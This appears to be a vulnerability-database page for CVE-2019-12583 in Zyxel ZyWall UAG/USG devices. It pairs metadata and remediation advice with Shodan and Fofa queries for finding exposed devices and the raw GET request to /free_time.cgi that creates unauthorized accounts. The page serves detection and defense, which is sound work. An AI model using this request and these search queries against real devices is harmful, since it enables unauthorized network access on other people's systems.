🔙 목록으로 돌아가기

CVE-2019-12583: Zyxel ZyWall UAG/USG - Account Creation Access

TitleZyxel ZyWall UAG/USG - Account Creation Access
Authorn-thumann,daffainfo
SeverityCritical
ImpactAn attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges.
RemediationApply the latest firmware update provided by Zyxel to fix the vulnerability.
CVSS Score9.1
EPSS Score0.59063
CVE IDCVE-2019-12583
CWE IDCWE-425
Shodan Queryhttp.title:"zywall"
Fofa Querytitle="zywall"
Tags cve cve2019 zyxel zywall xss vuln

🔍 Vulnerability Description

Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the “Free Time” component. This can lead to unauthorized network access or DoS attacks.

🌐 HTTP Request

GET /free_time.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12583.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-12583.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A